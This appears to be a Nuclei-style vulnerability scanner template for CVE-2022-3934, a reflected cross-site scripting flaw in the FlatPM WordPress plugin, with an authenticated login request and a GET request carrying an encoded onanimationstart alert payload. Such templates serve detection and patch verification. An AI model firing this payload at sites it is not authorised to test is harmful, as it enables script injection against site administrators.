43 lines
1.4 KiB
YAML
43 lines
1.4 KiB
YAML
id: CVE-2022-3934
|
|
|
|
info:
|
|
name: Flat PM < 3.0.13 - Reflected Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The FlatPM WordPress plugin before 3.0.13 does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
|
|
remediation: Fixed in version 3.0.13.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-3934
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2022-3934
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: "true"
|
|
tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
@timeout: 10s
|
|
GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'
|
|
condition: and
|